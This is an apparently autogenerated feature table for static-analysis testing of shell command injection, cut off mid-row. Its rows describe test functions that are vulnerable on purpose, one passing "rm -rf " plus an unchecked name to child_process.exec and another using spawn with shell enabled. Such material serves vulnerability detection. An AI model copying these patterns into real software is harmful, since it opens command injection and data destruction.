autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | this | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | this | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | this | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | 'arguments' object of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | exceptional return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | exceptional return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | functio ... st.js\\n} | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | functio ... st.js\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | functio ... st.js\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | functio ... st.js\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:9:1 | return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:32:7:35 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:3 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:3 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:3 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:8 | cp.exec | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:8 | cp.exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:8 | cp.exec | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | exceptional return of cp.exec ... + name) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:5:8:8 | exec | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:5:8:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:5:8:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:5:8:8 | exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:5:8:8 | exec | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:22:8:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:6 | module | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:6 | module | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:14 | module.exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:14 | module.exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:18 | module.exports.amd | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:18 | module.exports.amd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:18 | module.exports.amd | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:40 | module. ... md.js") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:40 | module. ... md.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:1:11:40 | module. ... md.js") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:8:11:14 | exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:8:11:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:8:11:14 | exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:16:11:18 | amd | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:16:11:18 | amd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:16:11:18 | amd | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:28 | require | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:28 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:28 | require | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | exceptional return of require("./amd.js") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | exceptional return of require("./amd.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | exceptional return of require("./amd.js") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") | assignedToPropName | amd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:30:11:39 | "./amd.js" | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:6 | module | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:6 | module | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:14 | module.exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:14 | module.exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:25 | module. ... ToShell | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:25 | module. ... ToShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:13:25 | module. ... ToShell | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:15:1 | module. ... OT OK\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:15:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:1:15:1 | module. ... OT OK\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:8:13:14 | exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:8:13:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:8:13:14 | exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:16:13:25 | arrToShell | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:16:13:25 | arrToShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:16:13:25 | arrToShell | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | cp | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | cp | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | this | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | this | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | this | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:13:28 | this | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | 'arguments' object of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | exceptional return of anonymous function | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | exceptional return of anonymous function | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | exceptional return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | functio ... OT OK\\n} | assignedToPropName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | functio ... OT OK\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | functio ... OT OK\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | return of anonymous function | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | return of anonymous function | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:29:15:1 | return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:39:13:41 | cmd | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:39:13:41 | cmd | contextSurroundingFunctionParameters | (cmd, arr) | +| 